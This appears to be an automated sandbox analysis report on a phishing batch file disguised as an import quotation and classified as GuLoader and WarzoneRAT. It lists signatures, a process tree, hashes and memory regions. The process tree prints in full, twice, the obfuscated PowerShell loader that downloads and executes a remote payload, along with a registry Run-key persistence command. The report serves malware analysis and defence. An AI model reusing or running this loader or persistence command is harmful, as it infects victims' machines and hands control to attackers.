Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/09/2024, 14:30

General

  • Target

    Final quarter Import request list quotation for _IMP1573_Rudra Industries_20240905.bat

  • Size

    3KB

  • MD5

    a96683a18065602e77af0a6d01f0ce60

  • SHA1

    3807eb2fc12a5f20d9f1729db85b9ff22d6d6eac

  • SHA256

    9eabea1861473790bae6df91943268131241cf8b4f52bfefa659fb557541e8d8

  • SHA512

    61a02fe1e4a01c7b8372402d9e56fbc6987de98c87631c201fa1f484972df4ed63e4a39ceee341478ebd0c9747d29ad053167a67f4899247048638a82c2b44ee

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Final quarter Import request list quotation for _IMP1573_Rudra Industries_20240905.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:380
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "If (${host}.Name) {$Epsilons++;$Assurancesummen+='subst';$Assurancesummen+='r';}$Assurancesummen+='ing';Function Summarizing($Sygehusenes){$Unitentacular=$Sygehusenes.Length-$Epsilons;For( $Realpolitikkens=2;$Realpolitikkens -lt $Unitentacular;$Realpolitikkens+=3){$Shaksheer+=$Sygehusenes.$Assurancesummen.'Invoke'( $Realpolitikkens, $Epsilons);}$Shaksheer;}function Rligstes($Mellitum){ . ($Marki) ($Mellitum);}$Nonappreciative=Summarizing 'AkM Mo ,zYei ,l AlAnaIs/F,5Fu.El0,s So(OsWAniArnEid,uo hwAtsNo SkNSmT,o fr1Et0Op.Fi0Te; B BlW .iUnnF.6Bi4 A; A J,x ,6Sa4Ko; P TrJave :L.1H,2,e1 O.Ti0 )Pe OvGCheL c k.eo ./Ve2.r0A.1un0Vi0Fo1Ud0G,1Zi lFdaiKor deFof.uo NxMa/Is1.c2A.1Kl.Sh0Ca ';$linjeringer=Summarizing ' aUFasAneP.r,a-TaABrgEye,anMotIn ';$Unmanducated224=Summarizing '.uh StC,tClpAisA :L./em/l.fL.iOplBue .s FhU.al,rFaeAlsTv.N op.rAng ./BacChs,rsB./.oB oe IsSekGimScmQueWadMgeSi.S lA z.ihNy ';$strintede=Summarizing ' i> P ';$Marki=Summarizing ',iiBreGrxRe ';$Junglegym='Mest';$Uheldigt = Summarizing ' .eVicMah.ioUn .%FoaMopSepB,dPoa ,tS aHe%Bl\PrCP,o Hl .o rWarD.hDraZap.oh.uy S. ,ULinUlw N T,&En& N ,ke ScFrhSpoBe TrtBr ';Rligstes (Summarizing 'Li$VigTilSpoS.bSpaColMo: ,LFoi GgLghAltC yBl=A.(anc,lmF,dH In/,acVr Li$ ,US,hBleMalEnd iFegPutSa)Uo ');Rligstes (Summarizing 'To$ .g.alMioj b a Tl m:DdU,dnA,iSut hi asUdaPft iS.o pn v=H.$,eURenJemC,a,tn TdteuG,cTia .t IeFadVi2Ko2Ga4Ca. As p FlPaiWetko( T$P.s tMyr,viKlnAntAfe dCre U) J ');Rligstes (Summarizing ' U[.yN AeSkt A..kS AeLurDevMiiGicRoe,ePGeo Fi hnB,t rMStaGanSka,ogUneDrrEp],o:Sm:MiSMieNucD.uFlr pibrt SyBrPthrSao ,tHyo ScDeoDalTi Ga= A Ko[ N oeHot.a.,lS,de Sc Hu MrMeiDut.my GPJ,rBooSutheo BcInoUolAnTFoyblpRaeEs]Mi: T:veT,ol Ls Z1Pa2Af ');$Unmanducated224=$Unitisation[0];$Gemmating= (Summarizing 'Ka$MigMilApo bN.aMrl .:AfBNaoCytR,tCeo.lmC,lAgaKnnRud .=reN,ke awS,-SiOOvbF.jSee,hc AtPo SySEfyTisLatPreSlmEx.O,NHoeA.tHe. VWRee ,bTiCInl Si.aeTinIrt');$Gemmating+=$Lighty[1];Rligstes ($Gemmating);Rligstes (Summarizing 'An$U,BStoMot,itProt m,ylTaaC nSad F.HaHSte ,a kd De urUnsCr[H.$Tal yi.anAbjDieStrGsiA n gTreKrrCr]Ud=,k$M,N ,oM.nFraMop,ipVerRie ,cJaiT,aPlt,hiMavFneW. ');$Rondache=Summarizing 's $ SBUnoS tAmthyo Mm.nlChaO,nAndD..EnDProBiwQun SlMootia Md DFbriunlGeeAu( ,$GrU VnEkmTia nA,dImu Kc ,aH,tuneSudFi2 .2M,4Ke,T $Ano,md ue,inD.s .eSbsMa)Rh ';$odenses=$Lighty[0];Rligstes (Summarizing ' C$ ,gFolOuoFlbBuaNolI,:DeA ,mBlaSirPry MlUdlKuiAfsBreTur I= C(UnTBreShsCatV -ZePUna it .hE, .p$ no dSpeRunV,sSke,ls O) ');while (!$Amarylliser) {Rligstes (Summarizing 'L.$ lgthlT,oStb PaUnl,v:FoN ao ,nConDiuE.l Tl SiMafRki lcSia St .i oS.nTi= S$Stt erUruseeSa ') ;Rligstes $Rondache;Rligstes (Summarizing ' ESGatLya Hr at F- NSTalLueBreGap r di4ca ');Rligstes (Summarizing ' .$L,g SlHiofib naAdlM.:unAKrmTha.ar ry .l cl CiO,sUneEkrRe=Ja( CTBeeKasTut i- BPOlagrtRghRe c$Reo FdSte KnvesMee FsHa)Ch ') ;Rligstes (Summarizing 'H,$StgEvlImo Gb ra DlPa:InPEgr KeKdr ,eFogTri Ms Otste.vrFa=Ha$Afg l ,oa,bdeaA l,u:OvTR rBeo.emKim oeTal sCa+ku+Kr% G$MaU On.ei rtS iRusTaaEvtReiAnoPrnUn. ncFuoO uStnAmtTo ') ;$Unmanducated224=$Unitisation[$Preregister];}$Reklameindtgter=317357;$Skalk=26107;Rligstes (Summarizing 'St$FogDelAlo ,bA a,el e:ObALacEnh,nr .o Rn CiBasS.mEx p.=Pr .GPhe btDo-DeCReo ,nFltRieBlnKetko Ha$FroCod PeS,n fsLee asGa ');Rligstes (Summarizing ',o$Dig.al .o DbFoaV lAb:S,SJia.rlGauM,e D S=Pr U[,vSBly.dsMutEgeSemSk.HoCGeoGin Dv aeDirRatTu]Na:fr:,rF nrQ oPemExBEkaThsE.e B6.c4BaSPet rB iF n ygGa(di$EfAanc vhFarS,oCin uiT sTem M)Un ');Rligstes (Summarizing 'S.$ rg.dl.loAwbSaa,il J:G,TTeoEngBarPreUmnS eBldF.eDysDi M.= , A.[ExSBlyL,s etOue rm i.,aT,reD,x,at.a. VE jnUpc SoredfoiAnn PgFr] I:In:ChAHeSReC UIWaIBr. MGOfeQutSuSKot,irP,iTonG g (,r$ .SPoaDel oucoeri)B ');Rligstes (Summarizing 'Fi$ ,g.al Po.pbsaaorl.l:CafSnoAmn idT,sP a ukLat,aiUleInnK.=Op$ oTFoo.cg LrD,eK.n BeOvdT,eFus F.eksMuuGlbInsMat Mr.siMon.ugPi(Fe$.hRNoeRek.nluna PmKoe,niHjnHedUut Ag tg.e drUn, ,$ aSD,kSqaG,l BkUd)Lu ');Rligstes $fondsaktien;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4720
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Colorrhaphy.Unw && echo t"
        3⤵
          PID:2616
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.Name) {$Epsilons++;$Assurancesummen+='subst';$Assurancesummen+='r';}$Assurancesummen+='ing';Function Summarizing($Sygehusenes){$Unitentacular=$Sygehusenes.Length-$Epsilons;For( $Realpolitikkens=2;$Realpolitikkens -lt $Unitentacular;$Realpolitikkens+=3){$Shaksheer+=$Sygehusenes.$Assurancesummen.'Invoke'( $Realpolitikkens, $Epsilons);}$Shaksheer;}function Rligstes($Mellitum){ . ($Marki) ($Mellitum);}$Nonappreciative=Summarizing 'AkM Mo ,zYei ,l AlAnaIs/F,5Fu.El0,s So(OsWAniArnEid,uo hwAtsNo SkNSmT,o fr1Et0Op.Fi0Te; B BlW .iUnnF.6Bi4 A; A J,x ,6Sa4Ko; P TrJave :L.1H,2,e1 O.Ti0 )Pe OvGCheL c k.eo ./Ve2.r0A.1un0Vi0Fo1Ud0G,1Zi lFdaiKor deFof.uo NxMa/Is1.c2A.1Kl.Sh0Ca ';$linjeringer=Summarizing ' aUFasAneP.r,a-TaABrgEye,anMotIn ';$Unmanducated224=Summarizing '.uh StC,tClpAisA :L./em/l.fL.iOplBue .s FhU.al,rFaeAlsTv.N op.rAng ./BacChs,rsB./.oB oe IsSekGimScmQueWadMgeSi.S lA z.ihNy ';$strintede=Summarizing ' i> P ';$Marki=Summarizing ',iiBreGrxRe ';$Junglegym='Mest';$Uheldigt = Summarizing ' .eVicMah.ioUn .%FoaMopSepB,dPoa ,tS aHe%Bl\PrCP,o Hl .o rWarD.hDraZap.oh.uy S. ,ULinUlw N T,&En& N ,ke ScFrhSpoBe TrtBr ';Rligstes (Summarizing 'Li$VigTilSpoS.bSpaColMo: ,LFoi GgLghAltC yBl=A.(anc,lmF,dH In/,acVr Li$ ,US,hBleMalEnd iFegPutSa)Uo ');Rligstes (Summarizing 'To$ .g.alMioj b a Tl m:DdU,dnA,iSut hi asUdaPft iS.o pn v=H.$,eURenJemC,a,tn TdteuG,cTia .t IeFadVi2Ko2Ga4Ca. As p FlPaiWetko( T$P.s tMyr,viKlnAntAfe dCre U) J ');Rligstes (Summarizing ' U[.yN AeSkt A..kS AeLurDevMiiGicRoe,ePGeo Fi hnB,t rMStaGanSka,ogUneDrrEp],o:Sm:MiSMieNucD.uFlr pibrt SyBrPthrSao ,tHyo ScDeoDalTi Ga= A Ko[ N oeHot.a.,lS,de Sc Hu MrMeiDut.my GPJ,rBooSutheo BcInoUolAnTFoyblpRaeEs]Mi: T:veT,ol Ls Z1Pa2Af ');$Unmanducated224=$Unitisation[0];$Gemmating= (Summarizing 'Ka$MigMilApo bN.aMrl .:AfBNaoCytR,tCeo.lmC,lAgaKnnRud .=reN,ke awS,-SiOOvbF.jSee,hc AtPo SySEfyTisLatPreSlmEx.O,NHoeA.tHe. VWRee ,bTiCInl Si.aeTinIrt');$Gemmating+=$Lighty[1];Rligstes ($Gemmating);Rligstes (Summarizing 'An$U,BStoMot,itProt m,ylTaaC nSad F.HaHSte ,a kd De urUnsCr[H.$Tal yi.anAbjDieStrGsiA n gTreKrrCr]Ud=,k$M,N ,oM.nFraMop,ipVerRie ,cJaiT,aPlt,hiMavFneW. ');$Rondache=Summarizing 's $ SBUnoS tAmthyo Mm.nlChaO,nAndD..EnDProBiwQun SlMootia Md DFbriunlGeeAu( ,$GrU VnEkmTia nA,dImu Kc ,aH,tuneSudFi2 .2M,4Ke,T $Ano,md ue,inD.s .eSbsMa)Rh ';$odenses=$Lighty[0];Rligstes (Summarizing ' C$ ,gFolOuoFlbBuaNolI,:DeA ,mBlaSirPry MlUdlKuiAfsBreTur I= C(UnTBreShsCatV -ZePUna it .hE, .p$ no dSpeRunV,sSke,ls O) ');while (!$Amarylliser) {Rligstes (Summarizing 'L.$ lgthlT,oStb PaUnl,v:FoN ao ,nConDiuE.l Tl SiMafRki lcSia St .i oS.nTi= S$Stt erUruseeSa ') ;Rligstes $Rondache;Rligstes (Summarizing ' ESGatLya Hr at F- NSTalLueBreGap r di4ca ');Rligstes (Summarizing ' .$L,g SlHiofib naAdlM.:unAKrmTha.ar ry .l cl CiO,sUneEkrRe=Ja( CTBeeKasTut i- BPOlagrtRghRe c$Reo FdSte KnvesMee FsHa)Ch ') ;Rligstes (Summarizing 'H,$StgEvlImo Gb ra DlPa:InPEgr KeKdr ,eFogTri Ms Otste.vrFa=Ha$Afg l ,oa,bdeaA l,u:OvTR rBeo.emKim oeTal sCa+ku+Kr% G$MaU On.ei rtS iRusTaaEvtReiAnoPrnUn. ncFuoO uStnAmtTo ') ;$Unmanducated224=$Unitisation[$Preregister];}$Reklameindtgter=317357;$Skalk=26107;Rligstes (Summarizing 'St$FogDelAlo ,bA a,el e:ObALacEnh,nr .o Rn CiBasS.mEx p.=Pr .GPhe btDo-DeCReo ,nFltRieBlnKetko Ha$FroCod PeS,n fsLee asGa ');Rligstes (Summarizing ',o$Dig.al .o DbFoaV lAb:S,SJia.rlGauM,e D S=Pr U[,vSBly.dsMutEgeSemSk.HoCGeoGin Dv aeDirRatTu]Na:fr:,rF nrQ oPemExBEkaThsE.e B6.c4BaSPet rB iF n ygGa(di$EfAanc vhFarS,oCin uiT sTem M)Un ');Rligstes (Summarizing 'S.$ rg.dl.loAwbSaa,il J:G,TTeoEngBarPreUmnS eBldF.eDysDi M.= , A.[ExSBlyL,s etOue rm i.,aT,reD,x,at.a. VE jnUpc SoredfoiAnn PgFr] I:In:ChAHeSReC UIWaIBr. MGOfeQutSuSKot,irP,iTonG g (,r$ .SPoaDel oucoeri)B ');Rligstes (Summarizing 'Fi$ ,g.al Po.pbsaaorl.l:CafSnoAmn idT,sP a ukLat,aiUleInnK.=Op$ oTFoo.cg LrD,eK.n BeOvdT,eFus F.eksMuuGlbInsMat Mr.siMon.ugPi(Fe$.hRNoeRek.nluna PmKoe,niHjnHedUut Ag tg.e drUn, ,$ aSD,kSqaG,l BkUd)Lu ');Rligstes $fondsaktien;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2344
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Colorrhaphy.Unw && echo t"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1636
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe"
            4⤵
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2536
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Doktorringens" /t REG_EXPAND_SZ /d "%Haandledet% -w 1 $bebyrdelsen=(Get-ItemProperty -Path 'HKCU:\Intracity\').Relateringen;%Haandledet% ($bebyrdelsen)"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4556
              • C:\Windows\SysWOW64\reg.exe
                REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Doktorringens" /t REG_EXPAND_SZ /d "%Haandledet% -w 1 $bebyrdelsen=(Get-ItemProperty -Path 'HKCU:\Intracity\').Relateringen;%Haandledet% ($bebyrdelsen)"
                6⤵
                • Adds Run key to start application
                • System Location Discovery: System Language Discovery
                • Modifies registry key
                PID:4728

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nxg00qno.mrr.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\Colorrhaphy.Unw

      Filesize

      447KB

      MD5

      79595b573db61bc70ebee0b1908c2f7b

      SHA1

      46dd9a6726f98981c5f02b449d5c9395d6ee6459

      SHA256

      dd80984463126238eb42b0da44258eb2d5452e54fe6b2500e230d225a54973fd

      SHA512

      b96ebee4fba29a82965e60166b717b1ddc0f7a84cde954b0ccabf534816d57a5d7ec82105863dcb7aa8dc92cb4607b92fde5d526fcbf7350140c3becfea6d3f0

    • memory/2344-45-0x0000000007F10000-0x00000000084B4000-memory.dmp

      Filesize

      5.6MB

    • memory/2344-39-0x0000000005F00000-0x0000000005F1E000-memory.dmp

      Filesize

      120KB

    • memory/2344-57-0x00000000746C0000-0x0000000074E70000-memory.dmp

      Filesize

      7.7MB

    • memory/2344-49-0x00000000746CE000-0x00000000746CF000-memory.dmp

      Filesize

      4KB

    • memory/2344-50-0x00000000746C0000-0x0000000074E70000-memory.dmp

      Filesize

      7.7MB

    • memory/2344-47-0x00000000084C0000-0x000000000B624000-memory.dmp

      Filesize

      49.4MB

    • memory/2344-44-0x0000000007110000-0x0000000007132000-memory.dmp

      Filesize

      136KB

    • memory/2344-21-0x00000000746CE000-0x00000000746CF000-memory.dmp

      Filesize

      4KB

    • memory/2344-22-0x0000000002600000-0x0000000002636000-memory.dmp

      Filesize

      216KB

    • memory/2344-23-0x00000000746C0000-0x0000000074E70000-memory.dmp

      Filesize

      7.7MB

    • memory/2344-25-0x00000000746C0000-0x0000000074E70000-memory.dmp

      Filesize

      7.7MB

    • memory/2344-24-0x0000000005050000-0x0000000005678000-memory.dmp

      Filesize

      6.2MB

    • memory/2344-26-0x0000000005680000-0x00000000056A2000-memory.dmp

      Filesize

      136KB

    • memory/2344-27-0x0000000005720000-0x0000000005786000-memory.dmp

      Filesize

      408KB

    • memory/2344-43-0x0000000007160000-0x00000000071F6000-memory.dmp

      Filesize

      600KB

    • memory/2344-28-0x0000000005790000-0x00000000057F6000-memory.dmp

      Filesize

      408KB

    • memory/2344-41-0x0000000007890000-0x0000000007F0A000-memory.dmp

      Filesize

      6.5MB

    • memory/2344-40-0x0000000005F90000-0x0000000005FDC000-memory.dmp

      Filesize

      304KB

    • memory/2344-38-0x00000000058F0000-0x0000000005C44000-memory.dmp

      Filesize

      3.3MB

    • memory/2344-42-0x0000000007040000-0x000000000705A000-memory.dmp

      Filesize

      104KB

    • memory/2536-52-0x0000000000A00000-0x0000000001C54000-memory.dmp

      Filesize

      18.3MB

    • memory/2536-56-0x0000000001C60000-0x0000000004DC4000-memory.dmp

      Filesize

      49.4MB

    • memory/4720-13-0x00007FFC8CD40000-0x00007FFC8D801000-memory.dmp

      Filesize

      10.8MB

    • memory/4720-19-0x00007FFC8CD40000-0x00007FFC8D801000-memory.dmp

      Filesize

      10.8MB

    • memory/4720-2-0x00007FFC8CD43000-0x00007FFC8CD45000-memory.dmp

      Filesize

      8KB

    • memory/4720-12-0x00000268B4760000-0x00000268B4782000-memory.dmp

      Filesize

      136KB

    • memory/4720-18-0x00000268B4830000-0x00000268B4A4C000-memory.dmp

      Filesize

      2.1MB

    • memory/4720-16-0x00007FFC8CD40000-0x00007FFC8D801000-memory.dmp

      Filesize

      10.8MB

    • memory/4720-15-0x00007FFC8CD43000-0x00007FFC8CD45000-memory.dmp

      Filesize

      8KB

    • memory/4720-14-0x00007FFC8CD40000-0x00007FFC8D801000-memory.dmp

      Filesize

      10.8MB

    • memory/4720-61-0x00007FFC8CD40000-0x00007FFC8D801000-memory.dmp

      Filesize

      10.8MB